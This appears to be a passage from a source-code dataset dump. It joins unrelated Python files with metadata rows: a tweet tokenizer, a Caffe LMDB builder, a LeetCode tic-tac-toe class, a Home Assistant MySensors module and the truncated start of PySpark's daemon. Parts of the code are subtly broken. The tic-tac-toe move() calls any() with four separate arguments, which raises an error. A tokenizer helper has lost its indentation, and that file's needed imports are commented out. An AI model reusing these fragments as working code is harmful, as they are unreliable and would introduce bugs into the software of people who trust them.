        if token in self.special_puncts:
            return self.special_puncts[token]
        if self.demojizer is not None:
            return self.demojizer(token)
        else:
            return token
    else:
        return token
def _convert_token_to_id(self, token):
    """Convert a token (str) to an id using the vocab; unknown tokens map to <unk>."""
    return self.encoder.get(token, self.encoder.get(self.unk_token))

def _convert_id_to_token(self, index):
    """Convert an index (integer) to a token (str) using the vocab."""
    return self.decoder.get(index, self.unk_token)

def convert_tokens_to_string(self, tokens):
    """Convert a sequence of tokens (string) into a single string, undoing BPE "@@ " joins."""
    out_string = " ".join(tokens).replace("@@ ", "").strip()
    return out_string
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
    """Copy the vocab and merges files into *save_directory*; returns their paths."""
    if not os.path.isdir(save_directory):
        logger.error(f"Vocabulary path ({save_directory}) should be a directory")
        return
    out_vocab_file = os.path.join(
        save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["vocab_file"]
    )
    out_merge_file = os.path.join(
        save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["merges_file"]
    )

    # Only copy when the source and destination paths actually differ.
    if os.path.abspath(self.vocab_file) != os.path.abspath(out_vocab_file):
        copyfile(self.vocab_file, out_vocab_file)

    if os.path.abspath(self.merges_file) != os.path.abspath(out_merge_file):
        copyfile(self.merges_file, out_merge_file)

    return out_vocab_file, out_merge_file
# def decode(self, token_ids, skip_special_tokens=False, clean_up_tokenization_spaces=True):
# filtered_tokens = ' '.join(self.convert_ids_to_tokens(token_ids, skip_special_tokens=skip_special_tokens))
# tokens_generated_so_far = re.sub('(@@ )', '', string=filtered_tokens)
# tokens_generated_so_far = re.sub('(@@ ?$)', '', string=tokens_generated_so_far)
# return ''.join(tokens_generated_so_far)
def add_from_file(self, f):
    """
    Loads a pre-existing dictionary from a text file and adds its symbols to this instance.
    """
    if isinstance(f, str):
        # Given a path: open it ourselves and recurse with the file object.
        try:
            with open(f, "r", encoding="utf-8") as handle:
                self.add_from_file(handle)
        except FileNotFoundError as fnfe:
            raise fnfe
        except UnicodeError:
            raise Exception(f"Incorrect encoding detected in {f}, please rebuild the dataset")
        return
    for raw_line in f.readlines():
        entry = raw_line.strip()
        split_at = entry.rfind(" ")
        if split_at == -1:
            raise ValueError("Incorrect dictionary format, expected '<token> <cnt>'")
        # Everything before the final space is the token; the count is ignored.
        word = entry[:split_at]
        self.encoder[word] = len(self.encoder)
# Natural Language Toolkit: Twitter Tokenizer
#
# Copyright (C) 2001-2020 NLTK Project
# Author: Christopher Potts <cgpotts@stanford.edu>
# Ewan Klein <ewan@inf.ed.ac.uk> (modifications)
# Pierpaolo Pantone <> (modifications)
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
#
"""
Twitter-aware tokenizer, designed to be flexible and easy to adapt to new domains and tasks. The basic logic is this:
1. The tuple regex_strings defines a list of regular expression strings.
2. The regex_strings strings are put, in order, into a compiled regular expression object called word_re.
3. The tokenization is done by word_re.findall(s), where s is the user-supplied string, inside the tokenize() method of
the class Tokenizer.
4. When instantiating Tokenizer objects, there is a single option: preserve_case. By default, it is set to True. If it
is set to False, then the tokenizer will downcase everything except for emoticons.
"""
######################################################################
#
# import regex # https://github.com/nltk/nltk/issues/2409
# import html
#
######################################################################
# The following strings are components in the regular expression
# that is used for tokenizing. It's important that phone_number
# appears first in the final regex (since it can contain whitespace).
# It also could matter that tags comes after emoticons, due to the
# possibility of having text like
#
# <:| and some text >:)
#
# Most importantly, the final element should always be last, since it
# does a last ditch whitespace-based tokenization of whatever is left.
# ToDo: Update with http://en.wikipedia.org/wiki/List_of_emoticons ?
# This particular element is used in a couple ways, so we define it
# with a name:
# docstyle-ignore
EMOTICONS = r"""
(?:
[<>]?
[:;=8] # eyes
[\-o\*\']? # optional nose
[\)\]\(\[dDpP/\:\}\{@\|\\] # mouth
|
[\)\]\(\[dDpP/\:\}\{@\|\\] # mouth
[\-o\*\']? # optional nose
[:;=8] # eyes
[<>]?
|
<3 # heart
)"""
# URL pattern due to John Gruber, modified by Tom Winzig. See
# https://gist.github.com/winzig/8894715
# docstyle-ignore
URLS = r""" # Capture 1: entire matched URL
(?:
https?: # URL protocol and colon
(?:
/{1,3} # 1-3 slashes
| # or
[a-z0-9%] # Single letter or digit or '%'
# (Trying not to match e.g. "URI::Escape")
)
| # or
# looks like domain name followed by a slash:
[a-z0-9.\-]+[.]
(?:[a-z]{2,13})
/
)
(?: # One or more:
[^\s()<>{}\[\]]+ # Run of non-space, non-()<>{}[]
| # or
\([^\s()]*?\([^\s()]+\)[^\s()]*?\) # balanced parens, one level deep: (...(...)...)
|
\([^\s]+?\) # balanced parens, non-recursive: (...)
)+
(?: # End with:
\([^\s()]*?\([^\s()]+\)[^\s()]*?\) # balanced parens, one level deep: (...(...)...)
|
\([^\s]+?\) # balanced parens, non-recursive: (...)
| # or
[^\s`!()\[\]{};:'".,<>?«»“”‘’] # not a space or one of these punct chars
)
| # OR, the following to match naked domains:
(?:
(?<!@) # not preceded by a @, avoid matching foo@_gmail.com_
[a-z0-9]+
(?:[.\-][a-z0-9]+)*
[.]
(?:[a-z]{2,13})
\b
/?
(?!@) # not succeeded by a @,
# avoid matching "foo.na" in "foo.na@example.com"
)
"""
# docstyle-ignore
# The components of the tokenizer:
REGEXPS = (
URLS,
# Phone numbers:
r"""
(?:
(?: # (international)
\+?[01]
[ *\-.\)]*
)?
(?: # (area code)
[\(]?
\d{3}
[ *\-.\)]*
)?
\d{3} # exchange
[ *\-.\)]*
\d{4} # base
)""",
# ASCII Emoticons
EMOTICONS,
# HTML tags:
r"""<[^>\s]+>""",
# ASCII Arrows
r"""[\-]+>|<[\-]+""",
# Twitter username:
r"""(?:@[\w_]+)""",
# Twitter hashtags:
r"""(?:\#+[\w_]+[\w\'_\-]*[\w_]+)""",
# email addresses
r"""[\w.+-]+@[\w-]+\.(?:[\w-]\.?)+[\w-]""",
# docstyle-ignore
# Remaining word types:
r"""
(?:[^\W\d_](?:[^\W\d_]|['\-_])+[^\W\d_]) # Words with apostrophes or dashes.
|
(?:[+\-]?\d+[,/.:-]\d+[+\-]?) # Numbers, including fractions, decimals.
|
(?:[\w_]+) # Words without apostrophes or dashes.
|
(?:\.(?:\s*\.){1,}) # Ellipsis dots.
|
(?:\S) # Everything else that isn't whitespace.
""",
)
######################################################################
# This is the core tokenizing regex:
WORD_RE = regex.compile(r"""(%s)""" % "|".join(REGEXPS), regex.VERBOSE | regex.I | regex.UNICODE)
# WORD_RE performs poorly on these patterns:
HANG_RE = regex.compile(r"([^a-zA-Z0-9])\1{3,}")
# The emoticon string gets its own regex so that we can preserve case for
# them as needed:
EMOTICON_RE = regex.compile(EMOTICONS, regex.VERBOSE | regex.I | regex.UNICODE)
# These are for regularizing HTML entities to Unicode:
ENT_RE = regex.compile(r"&(#?(x?))([^&;\s]+);")
######################################################################
# Functions for converting html entities
######################################################################
def _str_to_unicode(text, encoding=None, errors="strict"):
if encoding is None:
encoding = "utf-8"
if isinstance(text, bytes):
return text.decode(encoding, errors)
return text
def _replace_html_entities(text, keep=(), remove_illegal=True, encoding="utf-8"):
    """
    Remove entities from text by converting them to their corresponding unicode character.

    Args:
        text:
            A unicode string or a byte string encoded in the given `encoding` (which defaults to 'utf-8').
        keep (list):
            List of entity names which should not be replaced. This supports both numeric entities (``&#nnnn;`` and
            ``&#hhhh;``) and named entities (such as ``&nbsp;`` or ``&gt;``).
        remove_illegal (bool):
            If `True`, entities that can't be converted are removed. Otherwise, entities that can't be converted are
            kept "as is".

    Returns: A unicode string with the entities removed.

    See https://github.com/scrapy/w3lib/blob/master/w3lib/html.py

        >>> from nltk.tokenize.casual import _replace_html_entities
        >>> _replace_html_entities(b'Price: &pound;100')
        'Price: \\xa3100'
        >>> print(_replace_html_entities(b'Price: &pound;100'))
        Price: £100
    """

    def _convert_entity(match):
        # ENT_RE groups: 1 = '#' marker (numeric entity), 2 = 'x' marker (hex), 3 = body.
        entity_body = match.group(3)
        if match.group(1):
            try:
                if match.group(2):
                    number = int(entity_body, 16)
                else:
                    number = int(entity_body, 10)
                # Numeric character references in the 80-9F range are typically
                # interpreted by browsers as representing the characters mapped
                # to bytes 80-9F in the Windows-1252 encoding. For more info
                # see: https://en.wikipedia.org/wiki/ISO/IEC_8859-1#Similar_character_sets
                if 0x80 <= number <= 0x9F:
                    return bytes((number,)).decode("cp1252")
            except ValueError:
                number = None
        else:
            # Named entity: honor the caller's keep-list, else map via the stdlib table.
            if entity_body in keep:
                return match.group(0)
            else:
                number = html.entities.name2codepoint.get(entity_body)
        if number is not None:
            try:
                return chr(number)
            except (ValueError, OverflowError):
                pass
        return "" if remove_illegal else match.group(0)

    return ENT_RE.sub(_convert_entity, _str_to_unicode(text, encoding))
######################################################################
class TweetTokenizer:
    r"""
    Examples::

        >>> # Tokenizer for tweets.
        >>> from nltk.tokenize import TweetTokenizer
        >>> tknzr = TweetTokenizer()
        >>> s0 = "This is a cooool #dummysmiley: :-) :-P <3 and some arrows < > -> <--"
        >>> tknzr.tokenize(s0)
        ['This', 'is', 'a', 'cooool', '#dummysmiley', ':', ':-)', ':-P', '<3', 'and', 'some', 'arrows', '<', '>', '->', '<--']

        >>> # Examples using `strip_handles` and `reduce_len parameters`:
        >>> tknzr = TweetTokenizer(strip_handles=True, reduce_len=True)
        >>> s1 = '@remy: This is waaaaayyyy too much for you!!!!!!'
        >>> tknzr.tokenize(s1)
        [':', 'This', 'is', 'waaayyy', 'too', 'much', 'for', 'you', '!', '!', '!']
    """

    def __init__(self, preserve_case=True, reduce_len=False, strip_handles=False):
        """
        Args:
            preserve_case: keep original casing (emoticons are never downcased).
            reduce_len: collapse runs of 3+ identical characters to exactly three.
            strip_handles: remove @username handles before tokenizing.
        """
        self.preserve_case = preserve_case
        self.reduce_len = reduce_len
        self.strip_handles = strip_handles

    def tokenize(self, text):
        """
        Args:
            text: str

        Returns: list(str) A tokenized list of strings; concatenating this list returns the original string if
        `preserve_case=False`
        """
        # Fix HTML character entities:
        text = _replace_html_entities(text)
        # Remove username handles
        if self.strip_handles:
            text = remove_handles(text)
        # Normalize word lengthening
        if self.reduce_len:
            text = reduce_lengthening(text)
        # Shorten problematic sequences of characters
        safe_text = HANG_RE.sub(r"\1\1\1", text)
        # Tokenize:
        words = WORD_RE.findall(safe_text)
        # Possibly alter the case, but avoid changing emoticons like :D into :d:
        if not self.preserve_case:
            words = list(map((lambda x: x if EMOTICON_RE.search(x) else x.lower()), words))
        return words
######################################################################
# Normalization Functions
######################################################################
def reduce_lengthening(text):
    """
    Replace repeated character sequences of length 3 or greater with sequences of length 3.
    """
    # e.g. "waaaaayyyy" -> "waaayyy"
    return regex.sub(r"(.)\1{2,}", r"\1\1\1", text)
def remove_handles(text):
    """
    Remove Twitter username handles from text.
    """
    # Either a maximal 20-char handle, or a 1-19 char handle not followed by
    # more handle characters; both must not be preceded by handle-like chars.
    handle_pattern = (
        r"(?<![A-Za-z0-9_!@#\$%&*])@(([A-Za-z0-9_]){20}(?!@))"
        r"|(?<![A-Za-z0-9_!@#\$%&*])@(([A-Za-z0-9_]){1,19})(?![A-Za-z0-9_]*@)"
    )
    # Substitute handles with ' ' to ensure that text on either side of removed handles are tokenized correctly
    return regex.sub(handle_pattern, " ", text)
######################################################################
# Tokenization Function
######################################################################
def casual_tokenize(text, preserve_case=True, reduce_len=False, strip_handles=False):
    """
    Convenience function for wrapping the tokenizer.
    """
    tokenizer = TweetTokenizer(
        preserve_case=preserve_case,
        reduce_len=reduce_len,
        strip_handles=strip_handles,
    )
    return tokenizer.tokenize(text)
###############################################################################
| 36.020888 | 133 | 0.55951 |
d47f54754bc960b7211c6944cf55ad6c39a012a8 | 3,211 | py | Python | scripts/create_lmdb.py | sagarjoglekar/ExplainingUrbanEmotions | 3b725b175435309cde3685b5b4af4c68ad867964 | [
"MIT"
] | 2 | 2018-04-24T14:26:46.000Z | 2021-02-02T08:16:04.000Z | scripts/create_lmdb.py | sagarjoglekar/ExplainingUrbanEmotions | 3b725b175435309cde3685b5b4af4c68ad867964 | [
"MIT"
] | null | null | null | scripts/create_lmdb.py | sagarjoglekar/ExplainingUrbanEmotions | 3b725b175435309cde3685b5b4af4c68ad867964 | [
"MIT"
] | null | null | null | '''
Description :This script divides the training images into 2 sets and stores them in lmdb databases for training and
'''
import os
import glob
import random
import numpy as np
import cv2
import caffe
from caffe.proto import caffe_pb2
import lmdb
# Size of images: the 227x227 input expected by AlexNet/CaffeNet-style models.
IMAGE_WIDTH = 227
IMAGE_HEIGHT = 227
def transform_img(img, img_width=IMAGE_WIDTH, img_height=IMAGE_HEIGHT):
    """Equalize each BGR channel's histogram, then resize to the target size."""
    # Histogram Equalization, channel by channel.
    for channel in range(3):
        img[:, :, channel] = cv2.equalizeHist(img[:, :, channel])
    # Image Resizing with cubic interpolation.
    return cv2.resize(img, (img_width, img_height), interpolation=cv2.INTER_CUBIC)
def make_datum(img, label):
    """Wrap a BGR numpy image and its label in a caffe Datum (channels-first bytes)."""
    # image is numpy.ndarray format. BGR instead of RGB; move channels first.
    channels_first = np.rollaxis(img, 2)
    return caffe_pb2.Datum(
        channels=3,
        width=IMAGE_WIDTH,
        height=IMAGE_HEIGHT,
        label=label,
        data=channels_first.tostring(),
    )
# NOTE(review): this script uses Python 2 `print` statements throughout —
# it must be run with a Python 2 interpreter.
train_lmdb = '../Data/train_lmdb_Depress4'
validation_lmdb = '../Data/validation_lmdb_Depress4'

# Start from a clean slate: drop any previously generated databases.
os.system('rm -rf ' + train_lmdb)
os.system('rm -rf ' + validation_lmdb)

#streetview/streetview/RankedBeauty_2/
# Directory layout encodes the label: .../train/1/*.jpg and .../train/0/*.jpg
train_data_beauty = [img for img in glob.glob("/work/sagarj/Work/BellLabs/streetview/RankedDepress_4/train/1/*jpg")]
train_data_ugly = [img for img in glob.glob("/work/sagarj/Work/BellLabs/streetview/RankedDepress_4/train/0/*jpg")]
test_data_beauty = [img for img in glob.glob("/work/sagarj/Work/BellLabs/streetview/RankedDepress_4/test/1/*jpg")]
test_data_ugly = [img for img in glob.glob("/work/sagarj/Work/BellLabs/streetview/RankedDepress_4/test/0/*jpg")]

train_data = train_data_beauty + train_data_ugly
test_data = test_data_beauty + test_data_ugly

#Shuffle train_data
random.shuffle(train_data)
random.shuffle(test_data)

print 'Creating train_lmdb'
in_db = lmdb.open(train_lmdb, map_size=int(1e12))
with in_db.begin(write=True) as in_txn:
    for in_idx, img_path in enumerate(train_data):
#        if in_idx % 6 == 0:
#            continue
        img = cv2.imread(img_path, cv2.IMREAD_COLOR)
        img = transform_img(img, img_width=IMAGE_WIDTH, img_height=IMAGE_HEIGHT)
        comp = img_path.split('/')
        # The parent directory name ('0' or '1') is the class label.
        if comp[-2] == '0':
            print "Ugg"
            label = 0
        else:
            print "Pretty"
            label = 1
        datum = make_datum(img, label)
        # Zero-padded index keeps LMDB keys in insertion order.
        in_txn.put('{:0>5d}'.format(in_idx), datum.SerializeToString())
        print '{:0>5d}'.format(in_idx) + ':' + img_path
in_db.close()

print '\nCreating validation_lmdb'
in_db = lmdb.open(validation_lmdb, map_size=int(1e12))
with in_db.begin(write=True) as in_txn:
    for in_idx, img_path in enumerate(test_data):
#        if in_idx % 6 != 0:
#            continue
        img = cv2.imread(img_path, cv2.IMREAD_COLOR)
        img = transform_img(img, img_width=IMAGE_WIDTH, img_height=IMAGE_HEIGHT)
        comp = img_path.split('/')
        if comp[-2] == '0':
            label = 0
        else:
            label = 1
        datum = make_datum(img, label)
        in_txn.put('{:0>5d}'.format(in_idx), datum.SerializeToString())
        print '{:0>5d}'.format(in_idx) + ':' + img_path
in_db.close()

print '\nFinished processing all images'
30f9cb925f21c49e39502299b66fb2b9ef545f4f | 1,468 | py | Python | Python/design-tic-tac-toe.py | se77enn/LeetCode-Solution | d29ef5358cae592b63952c3d293897a176fb75e1 | [
"MIT"
] | 1 | 2020-10-27T03:22:31.000Z | 2020-10-27T03:22:31.000Z | Python/design-tic-tac-toe.py | se77enn/LeetCode-Solution | d29ef5358cae592b63952c3d293897a176fb75e1 | [
"MIT"
] | null | null | null | Python/design-tic-tac-toe.py | se77enn/LeetCode-Solution | d29ef5358cae592b63952c3d293897a176fb75e1 | [
"MIT"
] | 1 | 2021-03-22T18:58:23.000Z | 2021-03-22T18:58:23.000Z | # Time: O(1), per move.
# Space: O(n^2)
try:
xrange # Python 2
except NameError:
xrange = range # Python 3
class TicTacToe(object):
def __init__(self, n):
"""
Initialize your data structure here.
:type n: int
"""
self.__size = n
self.__rows = [[0, 0] for _ in xrange(n)]
self.__cols = [[0, 0] for _ in xrange(n)]
self.__diagonal = [0, 0]
self.__anti_diagonal = [0, 0]
def move(self, row, col, player):
"""
Player {player} makes a move at ({row}, {col}).
@param row The row of the board.
@param col The column of the board.
@param player The player, can be either 1 or 2.
@return The current winning condition, can be either:
0: No one wins.
1: Player 1 wins.
2: Player 2 wins.
:type row: int
:type col: int
:type player: int
:rtype: int
"""
i = player - 1
self.__rows[row][i] += 1
self.__cols[col][i] += 1
if row == col:
self.__diagonal[i] += 1
if col == len(self.__rows) - row - 1:
self.__anti_diagonal[i] += 1
if any(self.__rows[row][i] == self.__size,
self.__cols[col][i] == self.__size,
self.__diagonal[i] == self.__size,
self.__anti_diagonal[i] == self.__size):
return player
return 0
| 28.230769 | 61 | 0.498638 |
d5ae6c0c156638ad6b2f3199fcc2622053b3eaf3 | 8,033 | py | Python | homeassistant/components/mysensors/device.py | CantankerousBullMoose/core | 2178e27fb4c62271d4872e16838331defed82226 | [
"Apache-2.0"
] | 1 | 2021-03-12T20:46:40.000Z | 2021-03-12T20:46:40.000Z | homeassistant/components/mysensors/device.py | CantankerousBullMoose/core | 2178e27fb4c62271d4872e16838331defed82226 | [
"Apache-2.0"
] | 46 | 2020-12-18T07:15:15.000Z | 2022-03-31T06:04:00.000Z | homeassistant/components/mysensors/device.py | CantankerousBullMoose/core | 2178e27fb4c62271d4872e16838331defed82226 | [
"Apache-2.0"
] | 2 | 2021-03-22T21:42:48.000Z | 2021-04-12T12:26:39.000Z | """Handle MySensors devices."""
from functools import partial
import logging
from typing import Any, Dict, Optional
from mysensors import BaseAsyncGateway, Sensor
from mysensors.sensor import ChildSensor
from homeassistant.const import ATTR_BATTERY_LEVEL, STATE_OFF, STATE_ON
from homeassistant.core import callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity import Entity
from .const import (
CHILD_CALLBACK,
CONF_DEVICE,
DOMAIN,
NODE_CALLBACK,
PLATFORM_TYPES,
UPDATE_DELAY,
DevId,
GatewayId,
)
_LOGGER = logging.getLogger(__name__)

# Keys used in the extra-state-attributes dict exposed by MySensors entities.
ATTR_CHILD_ID = "child_id"
ATTR_DESCRIPTION = "description"
ATTR_DEVICE = "device"
ATTR_NODE_ID = "node_id"
ATTR_HEARTBEAT = "heartbeat"

# hass.data key template for the per-platform device registry.
MYSENSORS_PLATFORM_DEVICES = "mysensors_devices_{}"
class MySensorsDevice:
    """Representation of a MySensors device."""

    def __init__(
        self,
        gateway_id: GatewayId,
        gateway: BaseAsyncGateway,
        node_id: int,
        child_id: int,
        value_type: int,
    ):
        """Set up the MySensors device."""
        self.gateway_id: GatewayId = gateway_id
        self.gateway: BaseAsyncGateway = gateway
        self.node_id: int = node_id
        self.child_id: int = child_id
        self.value_type: int = value_type  # value_type as int. string variant can be looked up in gateway consts
        self.child_type = self._child.type
        # Latest known values keyed by value_type; filled in by async_update().
        self._values = {}
        # Debounce flag so async_update_callback() coalesces bursts of updates.
        self._update_scheduled = False
        # Assigned externally when the device is attached to Home Assistant.
        self.hass = None

    @property
    def dev_id(self) -> DevId:
        """Return the DevId of this device.

        It is used to route incoming MySensors messages to the correct device/entity.
        """
        return self.gateway_id, self.node_id, self.child_id, self.value_type

    @property
    def _logger(self):
        # Per-device child logger, named after the entity for easy filtering.
        return logging.getLogger(f"{__name__}.{self.name}")

    async def async_will_remove_from_hass(self):
        """Remove this entity from home assistant."""
        # Drop this device from every platform registry it was stored in.
        for platform in PLATFORM_TYPES:
            platform_str = MYSENSORS_PLATFORM_DEVICES.format(platform)
            if platform_str in self.hass.data[DOMAIN]:
                platform_dict = self.hass.data[DOMAIN][platform_str]
                if self.dev_id in platform_dict:
                    del platform_dict[self.dev_id]
                    self._logger.debug(
                        "deleted %s from platform %s", self.dev_id, platform
                    )

    @property
    def _node(self) -> Sensor:
        # The gateway-side node object this device belongs to.
        return self.gateway.sensors[self.node_id]

    @property
    def _child(self) -> ChildSensor:
        # The child sensor on the node that this device represents.
        return self._node.children[self.child_id]

    @property
    def sketch_name(self) -> str:
        """Return the name of the sketch running on the whole node (will be the same for several entities!)."""
        return self._node.sketch_name

    @property
    def sketch_version(self) -> str:
        """Return the version of the sketch running on the whole node (will be the same for several entities!)."""
        return self._node.sketch_version

    @property
    def node_name(self) -> str:
        """Name of the whole node (will be the same for several entities!)."""
        return f"{self.sketch_name} {self.node_id}"

    @property
    def unique_id(self) -> str:
        """Return a unique ID for use in home assistant."""
        return f"{self.gateway_id}-{self.node_id}-{self.child_id}-{self.value_type}"

    @property
    def device_info(self) -> Optional[Dict[str, Any]]:
        """Return a dict that allows home assistant to puzzle all entities belonging to a node together."""
        return {
            "identifiers": {(DOMAIN, f"{self.gateway_id}-{self.node_id}")},
            "name": self.node_name,
            "manufacturer": DOMAIN,
            "sw_version": self.sketch_version,
        }

    @property
    def name(self):
        """Return the name of this entity."""
        return f"{self.node_name} {self.child_id}"

    @property
    def extra_state_attributes(self):
        """Return device specific state attributes."""
        node = self.gateway.sensors[self.node_id]
        child = node.children[self.child_id]
        attr = {
            ATTR_BATTERY_LEVEL: node.battery_level,
            ATTR_HEARTBEAT: node.heartbeat,
            ATTR_CHILD_ID: self.child_id,
            ATTR_DESCRIPTION: child.description,
            ATTR_NODE_ID: self.node_id,
        }
        # This works when we are actually an Entity (i.e. all platforms except device_tracker)
        if hasattr(self, "platform"):
            # pylint: disable=no-member
            attr[ATTR_DEVICE] = self.platform.config_entry.data[CONF_DEVICE]
        set_req = self.gateway.const.SetReq
        # Expose every cached value under its V_* constant name.
        for value_type, value in self._values.items():
            attr[set_req(value_type).name] = value
        return attr

    async def async_update(self):
        """Update the controller with the latest value from a sensor."""
        node = self.gateway.sensors[self.node_id]
        child = node.children[self.child_id]
        set_req = self.gateway.const.SetReq
        for value_type, value in child.values.items():
            _LOGGER.debug(
                "Entity update: %s: value_type %s, value = %s",
                self.name,
                value_type,
                value,
            )
            # Binary value types are normalized to HA's STATE_ON / STATE_OFF.
            if value_type in (
                set_req.V_ARMED,
                set_req.V_LIGHT,
                set_req.V_LOCK_STATUS,
                set_req.V_TRIPPED,
                set_req.V_UP,
                set_req.V_DOWN,
                set_req.V_STOP,
            ):
                self._values[value_type] = STATE_ON if int(value) == 1 else STATE_OFF
            elif value_type == set_req.V_DIMMER:
                self._values[value_type] = int(value)
            else:
                self._values[value_type] = value

    async def _async_update_callback(self):
        """Update the device."""
        raise NotImplementedError

    @callback
    def async_update_callback(self):
        """Update the device after delay."""
        # Coalesce: if an update is already pending, do nothing.
        if self._update_scheduled:
            return

        async def update():
            """Perform update."""
            try:
                await self._async_update_callback()
            except Exception:  # pylint: disable=broad-except
                _LOGGER.exception("Error updating %s", self.name)
            finally:
                self._update_scheduled = False

        self._update_scheduled = True
        # Defer the actual update by UPDATE_DELAY to debounce rapid messages.
        delayed_update = partial(self.hass.async_create_task, update())
        self.hass.loop.call_later(UPDATE_DELAY, delayed_update)
def get_mysensors_devices(hass, domain: str) -> Dict[DevId, MySensorsDevice]:
    """Return MySensors devices for a hass platform name."""
    platform_key = MYSENSORS_PLATFORM_DEVICES.format(domain)
    # Create the per-platform registry on first access.
    return hass.data[DOMAIN].setdefault(platform_key, {})
class MySensorsEntity(MySensorsDevice, Entity):
    """Representation of a MySensors entity."""

    @property
    def should_poll(self):
        """Return the polling state. The gateway pushes its states."""
        return False

    @property
    def available(self):
        """Return true if entity is available."""
        # Available once at least one value for our value_type has been seen.
        return self.value_type in self._values

    async def _async_update_callback(self):
        """Update the entity."""
        await self.async_update_ha_state(True)

    async def async_added_to_hass(self):
        """Register update callback."""
        # Child-level updates addressed to this exact device.
        self.async_on_remove(
            async_dispatcher_connect(
                self.hass,
                CHILD_CALLBACK.format(*self.dev_id),
                self.async_update_callback,
            )
        )
        # Node-level updates (e.g. battery/heartbeat) for the whole node.
        self.async_on_remove(
            async_dispatcher_connect(
                self.hass,
                NODE_CALLBACK.format(self.gateway_id, self.node_id),
                self.async_update_callback,
            )
        )
e7d1e718c934af9c553471513451bb0b092f4de7 | 6,731 | py | Python | python/pyspark/daemon.py | boyizhang/spark-2.3.2 | 3be504eb086c9f5a9ab857ae41fc037dad36f38d | [
"BSD-3-Clause-Open-MPI",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause-Clear",
"PostgreSQL",
"BSD-3-Clause"
] | 289 | 2018-06-03T15:22:04.000Z | 2021-12-08T14:17:38.000Z | python/pyspark/daemon.py | cfmcgrady/spark-adaptive | 6ad93e786856496c726f172ee409ac90f1dc6f2e | [
"Apache-2.0"
] | 95 | 2016-08-29T09:00:58.000Z | 2020-03-30T11:23:50.000Z | python/pyspark/daemon.py | cfmcgrady/spark-adaptive | 6ad93e786856496c726f172ee409ac90f1dc6f2e | [
"Apache-2.0"
] | 113 | 2018-06-01T01:50:00.000Z | 2021-08-24T15:40:27.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numbers
import os
import signal
import select
import socket
import sys
import traceback
import time
import gc
from errno import EINTR, EAGAIN
from socket import AF_INET, SOCK_STREAM, SOMAXCONN
from signal import SIGHUP, SIGTERM, SIGCHLD, SIG_DFL, SIG_IGN, SIGINT
from pyspark.worker import main as worker_main
from pyspark.serializers import read_int, write_int, write_with_length, UTF8Deserializer
def compute_real_exit_code(exit_code):
    """Coerce a SystemExit code to an int usable by os._exit (non-ints become 1)."""
    # SystemExit's code can be integer or string, but os._exit only accepts integers
    return exit_code if isinstance(exit_code, numbers.Integral) else 1
def worker(sock, authenticated):
    """
    Called by a worker process after the fork().

    Resets signal handlers inherited from the daemon, performs the shared
    secret handshake with the JVM side when not yet authenticated, then runs
    the PySpark worker main loop over the socket.  Returns the worker's exit
    code (0 on success, 1 on a failed handshake).
    """
    signal.signal(SIGHUP, SIG_DFL)
    signal.signal(SIGCHLD, SIG_DFL)
    signal.signal(SIGTERM, SIG_DFL)
    # restore the handler for SIGINT,
    # it's useful for debugging (show the stacktrace before exit)
    signal.signal(SIGINT, signal.default_int_handler)

    # Read the socket using fdopen instead of socket.makefile() because the latter
    # seems to be very slow; note that we need to dup() the file descriptor because
    # otherwise writes also cause a seek that makes us miss data on the read side.
    infile = os.fdopen(os.dup(sock.fileno()), "rb", 65536)
    outfile = os.fdopen(os.dup(sock.fileno()), "wb", 65536)

    if not authenticated:
        # Handshake: compare the client's secret against the one the JVM put
        # in our environment; reply "ok"/"err" and abort the worker on mismatch.
        client_secret = UTF8Deserializer().loads(infile)
        if os.environ["PYTHON_WORKER_FACTORY_SECRET"] == client_secret:
            write_with_length("ok".encode("utf-8"), outfile)
            outfile.flush()
        else:
            write_with_length("err".encode("utf-8"), outfile)
            outfile.flush()
            sock.close()
            return 1

    exit_code = 0
    try:
        worker_main(infile, outfile)
    except SystemExit as exc:
        # worker_main signals its exit status via SystemExit.
        exit_code = compute_real_exit_code(exc.code)
    finally:
        # Best-effort flush; the socket may already be gone.
        try:
            outfile.flush()
        except Exception:
            pass
    return exit_code
def manager():
    """Daemon main loop: accept connections and fork a worker per connection.

    Communicates with the JVM over stdin/stdout (port announcement, kill
    requests) and over a loopback TCP socket for worker traffic.
    """
    # Create a new process group to corral our children
    os.setpgid(0, 0)

    # Create a listening socket on the AF_INET loopback interface
    listen_sock = socket.socket(AF_INET, SOCK_STREAM)
    listen_sock.bind(('127.0.0.1', 0))
    listen_sock.listen(max(1024, SOMAXCONN))
    listen_host, listen_port = listen_sock.getsockname()

    # re-open stdin/stdout in 'wb' mode
    stdin_bin = os.fdopen(sys.stdin.fileno(), 'rb', 4)
    stdout_bin = os.fdopen(sys.stdout.fileno(), 'wb', 4)
    # Announce the ephemeral port to the JVM side.
    write_int(listen_port, stdout_bin)
    stdout_bin.flush()

    def shutdown(code):
        # Kill the whole process group, then exit with the given code.
        signal.signal(SIGTERM, SIG_DFL)
        # Send SIGHUP to notify workers of shutdown
        os.kill(0, SIGHUP)
        exit(code)

    def handle_sigterm(*args):
        shutdown(1)
    signal.signal(SIGTERM, handle_sigterm)  # Gracefully exit on SIGTERM
    signal.signal(SIGHUP, SIG_IGN)  # Don't die on SIGHUP
    signal.signal(SIGCHLD, SIG_IGN)

    reuse = os.environ.get("SPARK_REUSE_WORKER")

    # Initialization complete
    try:
        while True:
            try:
                # Wait (1s timeout) on stdin (fd 0) and the listen socket.
                ready_fds = select.select([0, listen_sock], [], [], 1)[0]
            except select.error as ex:
                # NOTE(review): `ex[0]` only works on Python 2, where
                # select.error is indexable; on Python 3 (OSError) this
